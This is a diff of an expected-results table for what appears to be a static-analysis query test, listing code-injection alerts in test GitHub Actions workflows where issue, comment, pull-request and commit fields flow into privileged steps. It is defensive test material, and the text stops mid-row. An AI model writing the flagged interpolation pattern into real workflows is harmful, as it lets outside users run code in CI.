steps.step.outputs.value | steps.step.outputs.value | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | needs.job1.outputs['job_output'] | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | github.event.workflow_run.display_title | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | github.event.workflow_run.head_commit.message | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | github.event.workflow_run.head_commit.author.email | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | github.event.workflow_run.head_commit.author.name | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | github.event.workflow_run.head_commit.committer.email | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | github.event.workflow_run.head_commit.committer.name | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | github.event.workflow_run.head_branch | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | github.event.workflow_run.head_repository.description | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| 